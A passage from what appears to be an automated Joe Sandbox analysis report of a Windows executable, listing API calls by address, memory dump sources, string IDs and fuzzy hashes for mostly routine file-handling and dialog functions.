                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentDirectory
                                                                                                            • String ID:
                                                                                                            • API String ID: 1611563598-0
                                                                                                            • Opcode ID: 3abf8698f24b160306dbfa8825a6738f30d59f68449f0b26a1f93a215c6d046a
                                                                                                            • Instruction ID: 7047a7c49c397a36f661c657ce57c610b61bf05168a7205450f4a010cefadb91
                                                                                                            • Opcode Fuzzy Hash: 3abf8698f24b160306dbfa8825a6738f30d59f68449f0b26a1f93a215c6d046a
                                                                                                            • Instruction Fuzzy Hash: 2EA01130200280AB82000B328F0AB0EBAAAAFA2B00F00C028A00088030CB30C820EA02
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNELBASE(000000FF,?,?,00CC95D6,?,?,?,?,?,00CF2641,000000FF), ref: 00CC963B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 38cb123a5dce571631a17392b854281b1b7c788a1d3932988227d428c2ac61fb
                                                                                                            • Instruction ID: 210fb91f7e8d684acc0e6d22dbfee8ce981e6e9a22c00fec4375d085a31e97ed
                                                                                                            • Opcode Fuzzy Hash: 38cb123a5dce571631a17392b854281b1b7c788a1d3932988227d428c2ac61fb
                                                                                                            • Instruction Fuzzy Hash: 5FF08270481B559FDB308A24C55CF92B7E8EB12321F045B5EE0F7429E0D771AA8DDA50
                                                                                                            APIs
                                                                                                              • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                                                                              • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00CDC2B1
                                                                                                            • EndDialog.USER32(?,00000006), ref: 00CDC2C4
                                                                                                            • GetDlgItem.USER32(?,0000006C), ref: 00CDC2E0
                                                                                                            • SetFocus.USER32(00000000), ref: 00CDC2E7
                                                                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 00CDC321
                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00CDC358
                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00CDC36E
                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CDC38C
                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CDC39C
                                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CDC3B8
                                                                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CDC3D4
                                                                                                            • _swprintf.LIBCMT ref: 00CDC404
                                                                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00CDC417
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00CDC41E
                                                                                                            • _swprintf.LIBCMT ref: 00CDC477
                                                                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 00CDC48A
                                                                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00CDC4A7
                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00CDC4C7
                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CDC4D7
                                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CDC4F1
                                                                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CDC509
                                                                                                            • _swprintf.LIBCMT ref: 00CDC535
                                                                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00CDC548
                                                                                                            • _swprintf.LIBCMT ref: 00CDC59C
                                                                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 00CDC5AF
                                                                                                              • Part of subcall function 00CDAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CDAF35
                                                                                                              • Part of subcall function 00CDAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00CFE72C,?,?), ref: 00CDAF84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                            • API String ID: 797121971-1840816070
                                                                                                            • Opcode ID: 093e697d8b5164016319e11279baa81396c80c1cf3f953fce81c6f72e0ece437
                                                                                                            • Instruction ID: cd1ebc94a721000d9124942cb92c8d98a5a3b800f47e1a861e9cf47a160ac87d
                                                                                                            • Opcode Fuzzy Hash: 093e697d8b5164016319e11279baa81396c80c1cf3f953fce81c6f72e0ece437
                                                                                                            • Instruction Fuzzy Hash: 6391A172248349BBD2219BA0DC89FFB77ACEB5A700F04481AF749C2181DB75A605DB72
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00CC6FAA
                                                                                                            • _wcslen.LIBCMT ref: 00CC7013
                                                                                                            • _wcslen.LIBCMT ref: 00CC7084
                                                                                                              • Part of subcall function 00CC7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CC7AAB
                                                                                                              • Part of subcall function 00CC7A9C: GetLastError.KERNEL32 ref: 00CC7AF1
                                                                                                              • Part of subcall function 00CC7A9C: CloseHandle.KERNEL32(?), ref: 00CC7B00
                                                                                                              • Part of subcall function 00CCA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641,000000FF), ref: 00CCA1F1
                                                                                                              • Part of subcall function 00CCA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641), ref: 00CCA21F
                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00CC7139
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00CC7155
                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00CC7298
                                                                                                              • Part of subcall function 00CC9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CC73BC,?,?,?,00000000), ref: 00CC9DBC
                                                                                                              • Part of subcall function 00CC9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00CC9E70
                                                                                                              • Part of subcall function 00CC9620: CloseHandle.KERNELBASE(000000FF,?,?,00CC95D6,?,?,?,?,?,00CF2641,000000FF), ref: 00CC963B
                                                                                                              • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA501
                                                                                                              • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA532
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                            • API String ID: 3983180755-3508440684
                                                                                                            • Opcode ID: 02e0cdc03e4c0363db78849456b2500bfe74d8e347233974e3f66c8efda39bf1
                                                                                                            • Instruction ID: 95114e75acfa216c9d21595b95490e12a13a6a2cf4e48eda25aeede841d1bbb5
                                                                                                            • Opcode Fuzzy Hash: 02e0cdc03e4c0363db78849456b2500bfe74d8e347233974e3f66c8efda39bf1
                                                                                                            • Instruction Fuzzy Hash: FCC10771904644AADB21EB74CC45FFEB3A8EF04300F04465EFA5AE7282DB34AB44DB61
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __floor_pentium4
                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                            • Opcode ID: 8ecb00cc2a06c62ddf76a09111962d54c4e1ad8dd23598221aaf769c9253cd49
                                                                                                            • Instruction ID: d7b4d547dd0cb42a2ab54b640686fe24ef419c251bc29d0d9245466d2fbaa64b
                                                                                                            • Opcode Fuzzy Hash: 8ecb00cc2a06c62ddf76a09111962d54c4e1ad8dd23598221aaf769c9253cd49
                                                                                                            • Instruction Fuzzy Hash: B4C26C72E086688FDB25CF2ADD407EAB7B5EB44344F1541EAD45EE7280E774AE818F40
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog_swprintf
                                                                                                            • String ID: CMT$h%u$hc%u
                                                                                                            • API String ID: 146138363-3282847064
                                                                                                            • Opcode ID: 8aee816759c7e97a35f6b288c3751c52dc71966fe4707b871556770954766e9f
                                                                                                            • Instruction ID: b4e371493b3eaecfb67e080f6a341349a5700cbe6da2c8a11302c1ae45bad27d
                                                                                                            • Opcode Fuzzy Hash: 8aee816759c7e97a35f6b288c3751c52dc71966fe4707b871556770954766e9f
                                                                                                            • Instruction Fuzzy Hash: BD32C371510384ABDF18DF74C895FE93BA5AF15300F08447EFD9A8B282DB749A49DB60
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00CC2874
                                                                                                            • _strlen.LIBCMT ref: 00CC2E3F
                                                                                                              • Part of subcall function 00CD02BA: __EH_prolog.LIBCMT ref: 00CD02BF
                                                                                                              • Part of subcall function 00CD1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CCBAE9,00000000,?,?,?,00010424), ref: 00CD1BA0
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CC2F91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                            • String ID: CMT
                                                                                                            • API String ID: 1206968400-2756464174
                                                                                                            • Opcode ID: ca1932151c833f6bc537fc1cbd695a794207c30092c3c359978f2865b65e50c1
                                                                                                            • Instruction ID: 24fb1c7222b9835cfd24726184c91ee2a04b0024a47753a05fe04976cb6ef7d9
                                                                                                            • Opcode Fuzzy Hash: ca1932151c833f6bc537fc1cbd695a794207c30092c3c359978f2865b65e50c1
                                                                                                            • Instruction Fuzzy Hash: 9F6207715002858FDF19DF78C895FEA3BA1EF54300F08857EECAA8B282D7759A45DB60
                                                                                                            APIs
                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CDF844
                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00CDF910
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CDF930
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00CDF93A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                            • String ID:
                                                                                                            • API String ID: 254469556-0
                                                                                                            • Opcode ID: 7cf94cbc9fc8af74227aca1d3c7f7dbc9681c427b025e67e83f0adc2bd57c167
                                                                                                            • Instruction ID: 6fcebeddfc2d6d0ae72d75bc2219cba86a1bef691bc648703e298b4e918354f1
                                                                                                            • Opcode Fuzzy Hash: 7cf94cbc9fc8af74227aca1d3c7f7dbc9681c427b025e67e83f0adc2bd57c167
                                                                                                            • Instruction Fuzzy Hash: 9A310575D05219ABDB21DFA4D989BCCBBB8BF08304F1040AAE50DAB350EB719B85DF45
                                                                                                            APIs
                                                                                                            • VirtualQuery.KERNEL32(80000000,00CDE5E8,0000001C,00CDE7DD,00000000,?,?,?,?,?,?,?,00CDE5E8,00000004,00D21CEC,00CDE86D), ref: 00CDE6B4
                                                                                                            • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00CDE5E8,00000004,00D21CEC,00CDE86D), ref: 00CDE6CF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoQuerySystemVirtual
                                                                                                            • String ID: D
                                                                                                            • API String ID: 401686933-2746444292
                                                                                                            • Opcode ID: 94f96072df3cf765b2baa05dc1aa45b6768562f803a3e4a90b6aa93d91978387
                                                                                                            • Instruction ID: f26e6ca273113e2141d5a8a97f57c9286f3e72418a144a8afff28d1bdc046691
                                                                                                            • Opcode Fuzzy Hash: 94f96072df3cf765b2baa05dc1aa45b6768562f803a3e4a90b6aa93d91978387
                                                                                                            • Instruction Fuzzy Hash: AF01DB726001096BDF14EE29DC49BED7BBAEFC4324F0DC125EE69DB254D634DA05C690
                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00CE8FB5
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00CE8FBF
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00CE8FCC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                            • String ID:
                                                                                                            • API String ID: 3906539128-0
                                                                                                            • Opcode ID: 9a1c2294b3477b2223522291cb83cf8fd01138f45bce202f26b2020d4e278448
                                                                                                            • Instruction ID: 118f242b147a4089c9d29f1e4edc54909f5b5d399a371ad9a92371d69eb81af4
                                                                                                            • Opcode Fuzzy Hash: 9a1c2294b3477b2223522291cb83cf8fd01138f45bce202f26b2020d4e278448
                                                                                                            • Instruction Fuzzy Hash: 1231C275901228ABCB21DF65DC89BDDBBB8BF08310F5041EAE41CA7250EB709F858F55
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .
                                                                                                            • API String ID: 0-248832578
                                                                                                            • Opcode ID: 0da8b73a3831edf556ca668c0779e1f84ff58a00c7fd6048c72f9a37c4d04a2d
                                                                                                            • Instruction ID: cff68884e002fb3dbcacaa3b5fa0b45133bf780ec306a264a233510e71d1a326
                                                                                                            • Opcode Fuzzy Hash: 0da8b73a3831edf556ca668c0779e1f84ff58a00c7fd6048c72f9a37c4d04a2d
                                                                                                            • Instruction Fuzzy Hash: 9731E9719002896FCB249E7ACC85EFB7BBDDF85314F1441A8F529D7292E7309E458B50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                            • Instruction ID: 7c510de64841e7e59483e8ffbea6c7aa83138824b2018a20e7987abacc7ac298
                                                                                                            • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                            • Instruction Fuzzy Hash: 5F022D71E012199BDF14CFA9C8806ADB7F5FF48314F158269E92AE7384D731AE41CB90
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CDAF35
                                                                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,00CFE72C,?,?), ref: 00CDAF84
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FormatInfoLocaleNumber
                                                                                                            • String ID:
                                                                                                            • API String ID: 2169056816-0
                                                                                                            • Opcode ID: 726e63f3b593431631490bf13e23f6b06197b6e269c713141a0df19a15f49f95
                                                                                                            • Instruction ID: f8cca00918f375a7ee0bcde4675e4bca1212bf0ce74e007ee70b73883032f57f
                                                                                                            • Opcode Fuzzy Hash: 726e63f3b593431631490bf13e23f6b06197b6e269c713141a0df19a15f49f95
                                                                                                            • Instruction Fuzzy Hash: 8D015E3A100348BAD7109F64EC45FAE77B8EF08750F108422FA05D72A0D7709965CBA6
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(00CC6DDF,00000000,00000400), ref: 00CC6C74
                                                                                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00CC6C95
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
